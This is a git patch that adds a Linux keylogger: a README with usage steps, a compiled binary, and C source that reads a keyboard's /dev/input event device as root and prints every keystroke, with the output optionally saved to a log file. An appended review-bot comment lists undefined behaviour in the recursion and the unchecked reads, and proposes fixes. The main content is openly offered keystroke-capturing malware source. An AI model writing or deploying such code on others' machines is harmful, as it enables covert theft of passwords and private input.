From 2bcf74b185a20e0872369207ee8315f62d88b548 Mon Sep 17 00:00:00 2001
From: Dim Kouv
Date: Thu, 24 Nov 2016 18:14:44 -0500
Subject: [PATCH] Initial Commit
---
 README.md | 25 +++++++
 bin/keylogger | Bin 0 -> 13072 bytes
 keylogger.c | 179 ++++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 204 insertions(+)
 create mode 100644 README.md
 create mode 100755 bin/keylogger
 create mode 100644 keylogger.c
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..6c7c834
--- /dev/null
+++ b/README.md
@@ -0,0 +1,25 @@
+# Linux Keylogger
+
+# How to use
+1. Find your keyboard device
+Your keyboard device should be in the below format
+```
+/dev/input/eventX
+```
+Find it using
+```sh
+$ cat /var/log/Xorg.0.log | grep /dev/input | grep -i keyboard
+```
+
+2. Run keylogger
+```sh
+$ sudo bin/keylogger /dev/input/eventX
+```
+
+
+3. Now whatever you type should be printed in the terminal.
+If you want to keep in log file use
+```sh
+$ sudo bin/keylogger /dev/input/eventX > logfile.txt
+```
+
diff --git a/bin/keylogger b/bin/keylogger new file mode 100755 index 0000000000000000000000000000000000000000..9e2a26b0b47639dd5b994512bcb91bd674eb19fc GIT binary patch literal 13072 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 Bj5GiM literal 0 HcmV?d00001 diff --git a/keylogger.c b/keylogger.c new file mode 100644 index 0000000..0ba7775 --- /dev/null +++ b/keylogger.c 
@@ -0,0 +1,179 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int get_key_press(int fd, struct input_event ev);
+int input_has_errors(int argc, char *argv[]);
+int user_is_root();
+char * get_key_description(int key_code);
+void generate_mappings(char ** mappings);
+
+
+/*
+ * returns 0 if user is not root
+ * else returns 1
+ */
+int user_is_root() {
+ if (geteuid() != 0) {
+ puts("You should run this script as root");
+ puts("ex: sudo ./keylogger /dev/input/deviceX");
+ return 0;
+ }
+ return 1;
+}
+
+
+/*
+ * If no input device specified returns 1
+ * If no errors it returns 0
+ */
+int input_has_errors(int argc, char *argv[]) {
+ if(argc < 2) {
+ puts("No input device given.");
+ puts("Usage: './keylogger device'");
+ puts("Device should be /dev/input/device*");
+ puts("Find it using: `cat /var/log/Xorg.0.log | grep /dev/input | grep -i keyboard`");
+ return 1;
+ }
+ return 0;
+}
+
+
+/*
+ * -Reads input event (key stroke)
+ * -Returns the key when it's released
+ * This means that by long pressing a key it only gets logged once.
+ * -If no key is pressed it calls itself recursively again
+ */
+int get_key_press(int fd, struct input_event ev) {
+ read(fd, &ev, sizeof(struct input_event));
+
+ // ev.value == 0 -> button is released
+ if (ev.type == 1 && ev.value == 0)
+ return ev.code;
+
+ // if no key pressed check again
+ get_key_press(fd, ev);
+}
+
+
+int main(int argc, char *argv[]) {
+ // Convert key codes to string values
+ // ex: mappings[code] = "value"
+ char * mappings[1024];
+ generate_mappings(mappings);
+
+
+ // Check for errors
+ if (input_has_errors(argc, argv)) {
+ return -1;
+ }
+ if (!user_is_root()) {
+ return -1;
+ }
+
+ // Start keyboard device as read only
+ int fd;
+ fd = open(argv[1], O_RDONLY);
+
+ // Initialize input event
+ struct input_event ev;
+
+ // Scan for key strokes and print them
+ while (1){
+ int key_code = get_key_press(fd, ev); // get key code
+ printf("%s\n",mappings[key_code]); // print value of key code
+ }
+
+ return 0;
+}
+
+
+/*
+ * Generates a value for each key stroke code
+ */
+void generate_mappings(char ** codes) {
+ codes[1] = "esc";
+ codes[59] = "f1";
+ codes[60] = "f2";
+ codes[61] = "f3";
+ codes[62] = "f4";
+ codes[63] = "f5";
+ codes[64] = "f6";
+ codes[65] = "f7";
+ codes[66] = "f8";
+ codes[67] = "f9";
+ codes[68] = "f10";
+ codes[87] = "f11";
+ codes[88] = "f12";
+ // --
+ codes[41] = "`";
+ codes[2] = "1";
+ codes[3] = "2";
+ codes[4] = "3";
+ codes[5] = "4";
+ codes[6] = "5";
+ codes[7] = "6";
+ codes[8] = "7";
+ codes[9] = "8";
+ codes[10] = "9";
+ codes[11] = "0";
+ codes[12] = "-";
+ codes[13] = "=";
+ codes[14] = "back";
+ // --
+ codes[15] = "tab";
+ codes[16] = "q";
+ codes[17] = "w";
+ codes[18] = "e";
+ codes[19] = "r";
+ codes[20] = "t";
+ codes[21] = "y";
+ codes[22] = "u";
+ codes[23] = "i";
+ codes[24] = "o";
+ codes[25] = "p";
+ codes[26] = "[";
+ codes[27] = "]";
+ codes[43] = "\\";
+ // --
+ codes[58] = "caps";
+ codes[30] = "a";
+ codes[31] = "s";
+ codes[32] = "d";
+ codes[33] = "f";
+ codes[34] = "g";
+ codes[35] = "h";
+ codes[36] = "j";
+ codes[37] = "k";
+ codes[38] = "l";
+ codes[39] = ";";
+ codes[40] = "\"";
+ codes[28] = "\n";
+ // --
+ codes[42] = "shift";
+ codes[44] = "z";
+ codes[45] = "x";
+ codes[46] = "c";
+ codes[47] = "v";
+ codes[48] = "b";
+ codes[49] = "n";
+ codes[50] = "m";
+ codes[51] = ",";
+ codes[52] = ".";
+ codes[53] = "/";
+ codes[54] = "shift";
+ // --
+ codes[29] = "ctrl";
+ codes[125] = "super";
+ codes[56] = "alt";
+ codes[57] = " ";
+ codes[100] = "alt";
+ codes[126] = "super";
+ codes[127] = "right click";
+ codes[97] = "ctrl";
+}
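Review bot: `get_key_press` has undefined behaviour on its common path: the trailing recursive call is not returned, so whenever the first event read is not a key release the function falls off its end and `main` indexes `mappings` with an indeterminate `key_code`. The result of `read()` is also ignored, and `open()` in `main` is unchecked, so a bad path or a short read makes the function recurse on an uninitialised `ev` until the stack is exhausted; a loop that compares the `read()` result with `sizeof ev` and returns a negative value on failure would remove both problems. In `main`, `mappings` is an uninitialised stack array of which `generate_mappings` fills only some slots, and `ev.code` is a 16-bit value read from whatever file `argv[1]` names, so `printf("%s\n", mappings[key_code])` can dereference a garbage or out-of-range pointer. Declare it as `char *mappings[1024] = {0};` and print only when `key_code >= 0 && key_code < 1024 && mappings[key_code]`. Since the process runs as root, these checks should come before any other change.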